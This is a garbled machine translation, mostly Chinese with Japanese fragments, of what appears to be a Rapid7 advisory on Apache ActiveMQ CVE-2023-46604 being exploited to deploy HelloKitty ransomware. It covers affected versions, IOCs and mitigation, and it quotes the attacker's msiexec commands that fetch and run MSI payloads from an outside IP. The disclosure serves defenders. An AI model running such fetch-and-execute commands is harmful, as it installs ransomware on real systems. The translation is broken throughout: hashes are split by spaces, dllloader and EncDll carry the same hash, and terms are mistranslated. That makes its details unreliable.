CVE-2023-46604:涉嫌滥用Apache ActiveMQ

从索要赎金的备忘录和可用的证据来看，10月初在论坛上被泄露了HelloKitty勒索软件家族的活动。。Rapid7在整个受损的客户环境中都观察到了类似的侵犯迹象，它们都运行着旧版本的Apache ActiveMQ。。

CVE-2023-46604在Apache ActiveMQ中远程代码运行漏洞、ブローカーにネットワーク・アクセスできるリモートの攻撃者が、"OpenWire プロトコルでシリアライズされたクラス・タイプを操作することで、任意のシェル・コマンドを実行し、ブローカーにクラスパス上の任意のクラスをインスタンス化させることができる" というものです。这是迄今为止我们对脆弱的解释中最复杂的一种，问题的根本原因是不安全的中心化。。

Apache公布了这个漏洞，在2023年10月25日我们发布了ActiveMQ的新版本。。概念验证(Proof-of-Concept)的漏洞利用代码和漏洞细节都被公开了。。Rapid7的脆弱研究团队测试了公开的PoC，发现MDR在客户环境中观察到的行为与CVE-2023-46604的恶意利用所预想的类似。。Rapid7研究发现，在atackerkb中进行技术分析。。

对象产品

apache的劝告根据，CVE-2023-46604影响如下:

• 5.18.3之前的Apache ActiveMQ 5.18.0
• 5.17.6之前的Apache ActiveMQ 5.17.0
• 5.16.7之前的Apache ActiveMQ 5.16.0
• 5.15.16之前的Apache ActiveMQ
• Apache ActiveMQ老式OpenWire模块5.18.0 5.18.3 以前
• Apache ActiveMQ老式OpenWire模块5.17.0 5.17.6 以前
• Apache ActiveMQ老式OpenWire模块5.16.0 5.16.7 以前
• Apache ActiveMQ老式OpenWire模块5.8.0 5.15.16 以前

被观察到的攻击者的行为

如果漏洞被成功利用，Java.exe将包含特定的Apache应用程序。。在这种情况下，在两个事故中作为父过程被观察到的" D:\Program文件\ActiveMQ\apache-activemq-5.15.3\bin\win64，包含"。入侵后，攻击者使用MSIExec将M2.png和M4.我尝试加载远程二进制的png。。Rapid7观察到的事故之一是，一半以上的资产加密尝试都失败了。。

HelloKitty勒索软件详情

Rapid7在域172.245.16[.]125到M4.png和M2.我们获得了png的MSI文件，并在受控环境中进行了分析。。在分析之后，Rapid7在两个MSI文件中内部使用了32位dllloader.NET可执行文件。。.NET可执行文件在dllloader中，Rapid7发现可执行文件加载Base64编码的有效载荷。。我们对Base64编码的有效载荷进行解码，这是一个名为EncDLL的32位.NET DLL。。

EncDLL二进制文件包含类似勒索软件的功能，DLL搜索特定进程，并停止其运行。。Rapid7是DLL使用RSACryptoServiceProvider函数对特定文件扩展名进行加密，在加密文件中添加扩展名.添加locked。。另外，提供关于避免加密的目录的信息的另一函数、分配了勒索软件的注意事项的静态变量、HTTP服务器172.245.16[.]125的函数。。

勒索软件的注意事项中规定，通信必须使用电子邮件地址service@hellokittycat[.应该通过online进行。。

妥协的指标

Rapid7的漏洞研究小组分析了CVE-2023-46604和公开的恶意利用代码。在我们的测试集��中，activemq.log中有一行条目显示成功滥用CVE-2023-46604:

2023-10-31 5:04:5 8736 | warn | transport connection to: tcp: / / 192.168.86.35:15871 java.net.socketexception: an established connection was aborted by the software in your host machine | info.apache.activemq.broker.transportconnection.transport | activemq transport: tcp: / / / 192.168.86.35:15871@61616

在上面的例子中，攻击者(即研究人员)的IP是192.168.86.在35处，目标TCP端口是61616。根据可变更的记录设定，可能获得更多或更少的信息。。

其他国际奥委会

• http://172.245.16[.]125/m2.png
• http://172.245.16[.]125/m4.png

文件dropped and executed via the msiexec command:

• cmd.exe /c "start msiexec / q/ihxxp://172.245.16[.]125/m4.png "
• cmd.exe /c "start msiexec / q/ihxxp://172.245.16[.]125/m4.png "

以下文件的散列在域名172.245.16[.125下载的两个MSI包的一部分。

• M2.msi: 8177455 89 a b c c 96 429 7 f c 26 b c d a 1 a 4 f b 21 f d c96a0cc96650843fd616551f4
• M4.msi: 8 e 1 f c 226 64 b 57 a 4 a 542 78 a 7 d b 59 b b 1 f 1 a 55 c f143782d93514e3bd86dc07a0
• dllloader: C3C0CF25D682E981C7CE1CC0A00FA2B8B46CCE2FA49ABE38BB412DA21DA99CB7 EncDll:C3C0CF25D682E981C7CE1CC0A00FA2B8B46CCE2FA49ABE38BB412DA21DA99CB7
• 3 e 65437 f 910 f 1 f 4 e 93809 b 81 c 19942 ef 74 aa 250使用ae 228 caca b 278 fc 523 ad 47 c

缓和方针

每个组织都应该尽快更新到ActiveMQ的修正版本，并在他们自己的环境中寻找被侵犯的迹象。。Apache提供的更新在这里得到可以做到。。Apache还提供信息以提高ActiveMQ实现的安全性有。。

Rapid7的客户

rapid 7 mdr、insightidr、および Managed Threat Complete (MTC) をご利用のお客様は、以下のルールが導入されており、この脅威に関連するエクスプロイト後のアクティビティについてアラートを発して有。。Rapid7建议确认客户环境中所有相应的资产都引入了洞察Agent:

• 可疑进程——Apache ActiveMQ激活CMD进程
• 攻击者的技巧- MSIExec通过HTTP加载对象
• 可疑进程-通过大量车辆服务删除车辆副本

insightvm和Nexpose的客户可以通过11月1日(周三)发布的Windows验证漏洞检查来评估暴露在CVE-2023-46604。

汤姆·埃尔金斯、约翰·费宁格、埃文·麦肯、马修·史密斯和麦卡·杨都在博客上发表了对攻击者行为的洞察。。

※本博客是英语版博客"Apache ActiveMQ CVE-2023-46604"的机器翻译版。。关于最新信息，请参照原文。。